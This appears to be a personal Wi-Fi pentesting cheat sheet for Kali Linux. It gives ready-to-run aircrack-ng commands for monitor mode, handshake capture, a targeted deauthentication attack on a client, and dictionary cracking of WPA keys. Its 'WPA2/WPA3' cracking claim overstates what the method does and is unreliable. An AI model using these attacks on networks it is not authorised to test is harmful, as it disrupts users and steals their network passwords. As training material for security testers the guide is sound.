# Wi-Fi Pentest
## Setup
### Adapter
{%preview https://hackmd.io/@lywslc/By6N2czr-x %}
### Configure NetworkManager
(Ignore Wi-Fi interface to prevent conflicts with tools like hostapd or aircrack-ng)
```bash
sudo vim /etc/NetworkManager/NetworkManager.conf
```
Add the following content to the bottom of config file:
```ini
[keyfile]
unmanaged-devices=interface-name:wlan0
```
Restart service to apply changes:
```bash
sudo systemctl restart NetworkManager
```
> [!Important]
> Kali Linux kernel version `6.17` may encounter errors during monitor mode. Use `6.12` instead (e.g., `6.12.38+kali-rt-arm64`)
## General Commands
### Check Interface Info
```bash
iw dev
```
#### Modes
- **Managed**: Standard client mode. Used for connecting to Access Points (APs).
- **Monitor**: Capable of **sniffing** all traffic in the air and injecting packets.
- **AP**: Acting as an Access Point. Used for hosting hotspots (e.g., Evil Twin attacks).
- **Etc**
### Switch Interface Mode
```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type [mode]
sudo ip link set wlan0 up
```
#### Available <mode\> Parameters
- **managed**: (Default) Client mode. Connects to an AP as a station (STA).
- **monitor**: Promiscuous mode. Listens to all traffic and allows packet injection.
- **ap**: Access Point mode. Creates a Wi-Fi hotspot (Master).
- **Etc**
#### Quick Examples
```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```
> [!Warning]
> If you encounter a "Device or resource busy" error, it indicates that a background process is holding the interface. Run `sudo airmon-ng check kill` to stop interfering services (like NetworkManager).
### Check Wi-Fi Regulatory Domain
```bash
iw reg get
```
Output:
```
global
country 00: DFS-UNSET
(755 - 928 @ 2), (N/A, 20), (N/A), PASSIVE-SCAN
(2402 - 2472 @ 40), (N/A, 20), (N/A)
(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
# ... (other bands omitted)
```
#### Parameters Explanation
- **country 00**: World Regulatory Domain (Strictest restrictions).
- **Output Syntax**: (Freq Range @ Bandwidth), (Max Gain, Max Power)
- **PASSIVE-SCAN**: Listening only; active probing/packet injection is disabled on these frequencies.
#### Change Region (to unlock higher TX Power/Channels)
```bash
sudo iw reg set TW
```
### Checking Driver Capabilities
```bash
iw list
```
#### Key Sections to Look For:
- **Supported interface modes**
- **Supported Ciphers**: Shows hardware support for WEP, WPA2 (CCMP), etc.
- **Frequencies**: Shows which channels are enabled or disabled.
### Scanning Available WiFi
Use this optimized command to see SSID, Signal, and encryption status:
```bash
sudo iw dev wlan0 scan | grep -E '^BSS|signal:|SSID:|capability:'
```
#### Output Fields Explanation:
- **signal**: Received signal strength (closer to `0` is stronger, e.g., `-30` is better than `-80`).
- **SSID**: The Wi-Fi name.
- **capability**:
- `ESS`: Regular Access Point.
- `Privacy`: **Encrypted** (requires a password). If missing, the network is **Open**.
- **HT/VHT/HE**: Indicates the IEEE standard:
- `HT`: 802.11n (Wi-Fi 4)
- `VHT`: 802.11ac (Wi-Fi 5)
- `HE`: 802.11ax (Wi-Fi 6)
## Pretend Wi-Fi AP
{%preview https://hackmd.io/@lywslc/rJ89gTVSbl %}
## Aircrack-ng Suite
### airmon-ng (Monitor Mode Management)
Used to kill interfering processes and enable monitor mode on the interface.
#### Kill Interfering Processes
Before starting monitor mode, stop services that might interfere (e.g., NetworkManager, wpa_supplicant):
```bash
sudo airmon-ng check kill
```
#### Enable Monitor Mode
```bash
sudo airmon-ng start wlan0
```
> [!Note]
> After running this, interface name will likely change from `wlan0` to `wlan0mon`. Check with `iw dev`.
### airodump-ng (Packet Sniffing)
Used to capture raw 802.11 frames, discover Access Points (APs), and capture Handshakes.
#### Scan All Networks
```bash
sudo airodump-ng wlan0mon
```
#### Output Fields Explanation
* **BSSID**: MAC address of the Access Point.
* **PWR**: Signal strength.
* **Beacons**: Announcement packets sent by the AP.
* **#Data**: Number of data packets captured (Higher is better for WEP cracking).
* **CH**: Channel number.
* **ENC**: Encryption method (OPEN, WEP, WPA, WPA2).
* **ESSID**: The Wi-Fi name.
#### Targeted Scan (Capture Handshake)
Once you identify a target, focus on its specific channel and BSSID to capture the **WPA Handshake**.
```bash
sudo airodump-ng --bssid <AP_MAC> --channel <CH> --write capture_filename wlan0mon
```
* `--write`: Saves the capture files (creates `.cap`, `.csv`, etc.).
* `--bssid`: Only listen to the target AP.
* `--channel`: Lock the card to a specific frequency to prevent channel hopping.
### aireplay-ng (Packet Injection)
Used to generate traffic or disrupt connections to force a client to reconnect (capturing the 4-way handshake).
#### Deauthentication Attack (Deauth)
Forces a client to disconnect from the AP. When they automatically reconnect, `airodump-ng` captures the handshake.
```bash
sudo aireplay-ng --deauth 10 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
```
* `--deauth 10`: Send 10 deauthentication frames (0 means infinite loop).
* `-a`: The BSSID (MAC address) of the Access Point.
* `-c`: The MAC address of the specific Victim Client (Targeting a specific client is stealthier than a broadcast attack).
### aircrack-ng (Cracking)
Used to crack the encryption key (password) from the captured `.cap` file using a wordlist.
#### Crack WPA2/WPA3
Requires a valid 4-way handshake captured by `airodump-ng`.
```bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <AP_MAC> capture_filename-01.cap
```
* `-w`: Path to the dictionary file (Wordlist).
* `-b`: BSSID of the target AP (selects the specific handshake if the file contains multiple).
* **capture_filename-01.cap**: The capture file generated by airodump-ng.
> [!Tip]
> If you see `Key Found! [ password123 ]`, you have successfully cracked the network.
Sign in with Wallet
Connect another wallet